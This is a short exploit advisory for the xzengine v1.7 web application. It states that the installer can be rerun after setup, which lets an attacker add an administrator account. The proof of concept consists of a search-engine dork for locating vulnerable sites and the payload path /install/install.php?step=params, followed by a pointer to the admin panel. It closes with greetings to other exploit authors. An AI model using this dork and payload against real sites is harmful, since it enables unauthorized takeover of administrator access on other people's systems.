====================================================================================================================================
| # Title     : xzengine v.1.7 Add Admin Vulnerability                                                                             |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             |
| # Vendor    : https://codecanyon.net/                                                                                            |
| # Dork      : 2005-2007 Powered by xzengine v.1.7 beta 8                                                                         |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] suffers from an add administrator vulnerability because after the first installation, the installation file repeats the installation process.

[+] Use payload : /install/install.php?step=params

[+] http://127.0.0.1/xzengine/admin

Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================